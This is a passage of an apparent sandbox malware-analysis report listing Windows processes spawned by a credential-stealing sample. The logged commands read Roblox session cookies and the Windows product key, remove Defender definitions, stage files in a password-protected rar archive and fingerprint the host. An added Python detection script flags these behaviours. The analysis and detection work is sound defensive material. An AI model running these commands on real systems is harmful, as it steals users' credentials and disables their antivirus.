                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:81
                                                                                                                                                                                                                                                                  Start time:02:36:05
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:tree /A /F
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6bd590000
                                                                                                                                                                                                                                                                  File size:20'992 bytes
                                                                                                                                                                                                                                                                  MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:82
                                                                                                                                                                                                                                                                  Start time:02:36:05
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:83
                                                                                                                                                                                                                                                                  Start time:02:36:06
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff649440000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:84
                                                                                                                                                                                                                                                                  Start time:02:36:06
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                                                  Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:85
                                                                                                                                                                                                                                                                  Start time:02:36:07
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 86
Start time: 02:36:07
Start date: 05/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff75da10000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 87
Start time: 02:36:07
Start date: 05/01/2025
Path: C:\Windows\System32\tree.com
Wow64 process (32bit): false
Commandline: tree /A /F
Imagebase: 0x7ff6bd590000
File size: 20'992 bytes
MD5 hash: 9EB969EF56718A6243BF60350CD065F0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 88
Start time: 02:36:08
Start date: 05/01/2025
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase: 0x7ff7a7b90000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 89
Start time: 02:36:08
Start date: 05/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff75da10000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 90
Start time: 02:36:08
Start date: 05/01/2025
Path: C:\Windows\System32\tree.com
Wow64 process (32bit): false
Commandline: tree /A /F
Imagebase: 0x7ff6bd590000
File size: 20'992 bytes
MD5 hash: 9EB969EF56718A6243BF60350CD065F0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 91
Start time: 02:36:08
Start date: 05/01/2025
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Imagebase: 0x7ff7a7b90000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 92
Start time: 02:36:08
Start date: 05/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff75da10000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 93
Start time: 02:36:09
Start date: 05/01/2025
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Imagebase: 0x7ff741d30000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 94
Start time: 02:36:10
Start date: 05/01/2025
Path: C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Imagebase: 0x7ff6b6530000
File size: 468'120 bytes
MD5 hash: B3676839B2EE96983F9ED735CD044159
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 95
Start time: 02:36:15
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\_MEI33962\rar.exe a -r -hp"Cribry10" "C:\Users\user~1\AppData\Local\Temp\aaDHy.zip" *"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:96
                                                                                                                                                                                                                                                                  Start time:02:36:15
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:97
                                                                                                                                                                                                                                                                  Start time:02:36:15
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Users\user~1\AppData\Local\Temp\_MEI33962\rar.exe a -r -hp"Cribry10" "C:\Users\user~1\AppData\Local\Temp\aaDHy.zip" *
                                                                                                                                                                                                                                                                  Imagebase:0x7ff708090000
                                                                                                                                                                                                                                                                  File size:630'736 bytes
                                                                                                                                                                                                                                                                  MD5 hash:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:98
                                                                                                                                                                                                                                                                  Start time:02:36:17
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:99
                                                                                                                                                                                                                                                                  Start time:02:36:17
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:100
                                                                                                                                                                                                                                                                  Start time:02:36:17
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:wmic os get Caption
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7c2f70000
                                                                                                                                                                                                                                                                  File size:576'000 bytes
                                                                                                                                                                                                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:101
                                                                                                                                                                                                                                                                  Start time:02:36:18
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:102
                                                                                                                                                                                                                                                                  Start time:02:36:18
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true
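Detection logic for the behaviours in the process records above, as an added example that is not part of the Joe Sandbox report: the elevated MpCmdRun.exe -RemoveDefinitions -All call (signature removal needs administrator rights, consistent with the "Has administrator privileges:true" field), a rar.exe binary dropped into a PyInstaller _MEI extraction directory and run with -hp (header and data encryption, so file names inside the archive are hidden too), and the wmic os / computersystem queries used for host and sandbox fingerprinting. The event dicts are constructed here from the report's Path and Commandline fields plus two benign controls; the field names (Image, CommandLine), rule names and score weights are assumptions of this example, not the report's.

```python
"""Process-creation rules for the chain shown in the report (added example).

The EVENTS list is constructed from the report's Path/Commandline fields
(Target IDs 95-103 and the MpCmdRun record) plus two benign controls; the
field names mirror Sysmon event ID 1 but no real log is read. Rule names
and WEIGHTS are assumptions made for this example.
"""
import re

EVENTS = [
    {"Image": r"C:\Program Files\Windows Defender\MpCmdRun.exe",
     "CommandLine": r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All'},
    {"Image": r"C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exe",
     "CommandLine": r'C:\Users\user~1\AppData\Local\Temp\_MEI33962\rar.exe a -r -hp"Cribry10" "C:\Users\user~1\AppData\Local\Temp\aaDHy.zip" *'},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe", "CommandLine": "wmic os get Caption"},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe", "CommandLine": "wmic computersystem get totalphysicalmemory"},
    # Benign controls (constructed): must produce no findings.
    {"Image": r"C:\Windows\System32\conhost.exe", "CommandLine": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"Image": r"C:\Program Files\WinRAR\Rar.exe", "CommandLine": r"Rar.exe a -r backup.rar D:\docs\*"},
]

# Assumed weights: one count per rule family, capped at 100 in triage().
WEIGHTS = {
    "defender_definitions_removed": 50,     # needs admin; no routine benign use
    "rar_password_archive": 30,             # -hp also hides file names: exfil staging
    "rar_bundled_in_pyinstaller_temp": 20,  # rar.exe dropped by a PyInstaller onefile binary
    "wmic_host_fingerprint": 5,             # low fidelity alone; admins run these too
}

# -hp"pw", -hppw, -p"pw"; switch must start a token so "-r" etc. do not match
RAR_PASSWORD = re.compile(r'(?<!\S)-(hp|p)"?([^"\s]+)"?')
PYINSTALLER_DIR = re.compile(r"\\_MEI\d+\\", re.IGNORECASE)
WMIC_RECON = (("os", "caption"), ("computersystem", "totalphysicalmemory"))


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def extract_rar_password(cmd):
    """Return (encryption mode, password) from a rar command line, or None.

    "-p-" means "no password prompt" in rar and is not a password.
    """
    m = RAR_PASSWORD.search(cmd)
    if not m or m.group(2) == "-":
        return None
    mode = "headers+data" if m.group(1) == "hp" else "data only"
    return (mode, m.group(2))


def detect(event):
    """Apply every rule to one process-creation event -> [(rule, detail), ...]."""
    image, cmd = basename(event["Image"]), event["CommandLine"]
    low = cmd.lower()
    hits = []
    if image == "mpcmdrun.exe" and "-removedefinitions" in low:
        hits.append(("defender_definitions_removed", "all" if "-all" in low else "partial"))
    if image in ("rar.exe", "winrar.exe"):
        pw = extract_rar_password(cmd)
        if pw:
            hits.append(("rar_password_archive", f"{pw[0]}; password={pw[1]}"))
        if PYINSTALLER_DIR.search(event["Image"]):
            hits.append(("rar_bundled_in_pyinstaller_temp", event["Image"]))
    if image == "wmic.exe":
        tokens = low.split()
        for alias, prop in WMIC_RECON:
            if alias in tokens and "get" in tokens and prop in tokens:
                hits.append(("wmic_host_fingerprint", f"{alias}.{prop}"))
    return hits


def triage(events):
    """Run all rules over a process list; score counts each rule family once."""
    findings = [(rule, detail, e["Image"]) for e in events for rule, detail in detect(e)]
    families = sorted({rule for rule, _, _ in findings})
    score = min(100, sum(WEIGHTS[f] for f in families))
    return {"findings": findings, "families": families, "score": score}


if __name__ == "__main__":
    result = triage(EVENTS)
    for rule, detail, image in result["findings"]:
        print(f"{rule:33} {detail:45} {image}")
    print("families:", result["families"], "score:", result["score"])
```

Two practical notes. The archive password is passed on the command line, so any process-creation telemetry (Sysmon, EDR, or this sandbox record) captures it; a responder who recovers the staged archive from the Temp directory can open it with the value returned by extract_rar_password. And the wmic rule is deliberately low weight: on its own it is routine administration, and it only matters here because it fires alongside signature removal and password-protected staging from the same _MEI directory.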

                                                                                                                                                                                                                                                                  Target ID:103
                                                                                                                                                                                                                                                                  Start time:02:36:18
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:wmic computersystem get totalphysicalmemory
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7c2f70000
                                                                                                                                                                                                                                                                  File size:576'000 bytes
                                                                                                                                                                                                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:104
                                                                                                                                                                                                                                                                  Start time:02:36:19
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:105
                                                                                                                                                                                                                                                                  Start time:02:36:19
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:106
                                                                                                                                                                                                                                                                  Start time:02:36:19
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7c2f70000
                                                                                                                                                                                                                                                                  File size:576'000 bytes
                                                                                                                                                                                                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:107
                                                                                                                                                                                                                                                                  Start time:02:36:20
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:108
                                                                                                                                                                                                                                                                  Start time:02:36:20
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:109
                                                                                                                                                                                                                                                                  Start time:02:36:20
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                                                                                                                  Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:110
                                                                                                                                                                                                                                                                  Start time:02:36:21
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

Target ID: 111
Start time: 02:36:21
Start date: 05/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff75da10000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 112
Start time: 02:36:21
Start date: 05/01/2025
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic path win32_VideoController get name
Imagebase: 0x7ff7c2f70000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 113
Start time: 02:36:22
Start date: 05/01/2025
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
Imagebase: 0x7ff7a7b90000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 114
Start time: 02:36:22
Start date: 05/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff75da10000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 115
Start time: 02:36:22
Start date: 05/01/2025
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Imagebase: 0x7ff741d30000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Execution Graph

Execution Coverage: 9.6%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 20.1%
Total number of Nodes: 2000
Total number of Limit Nodes: 26
